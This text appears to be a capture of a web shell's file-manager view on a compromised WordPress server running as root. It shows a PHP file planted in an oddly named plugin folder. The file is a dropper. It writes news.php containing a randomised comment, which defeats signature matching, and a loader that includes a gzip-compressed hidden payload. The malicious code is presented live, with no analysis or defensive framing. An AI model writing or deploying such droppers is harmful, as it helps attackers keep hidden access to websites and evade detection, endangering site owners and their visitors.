HEX
Server: nginx/1.24.0
System: Linux 0c1023d6c65e 6.8.0-137-generic #137-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 17 20:28:23 UTC 2026 x86_64
User: root (0)
PHP: 8.3.33
Disabled: NONE
Upload Files
File: /var/www/html/wp-content/plugins/9be6348719b8ccb6d0cda9d316068c33/new.php
<?php /* jWsOfk9AWqL3MD7 */ ?>
<?php
/**
 * Generate a random string similar to the original comment token.
 * Length: 40–50 characters, mix of letters, numbers, and symbols.
 */
function randomCommentToken($length = 44) {
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789~!@#$%^&*()-_=+{}[]|:;<>?,./';
    $token = '';
    for ($i = 0; $i < $length; $i++) {
        $token .= $chars[random_int(0, strlen($chars) - 1)];
    }
    return $token;
}

// Generate a new random token
$randomToken = randomCommentToken(44);  // similar length to the original

// The PHP code template (the same logic but with random comment)
$phpCode = <<<PHP
<?php
# {$randomToken}

\$bxoskw = function(\$p) { include \$p; };
\$stfhae = 'compress.zlib://ll2.gz';
call_user_func(\$bxoskw, \$stfhae);
?>
PHP;

// Write the generated code to a new file (e.g., "random_script.php")
$newFile = 'news.php';
file_put_contents($newFile, $phpCode);

echo "Generated file: $newFile with random token: $randomToken\n";
?>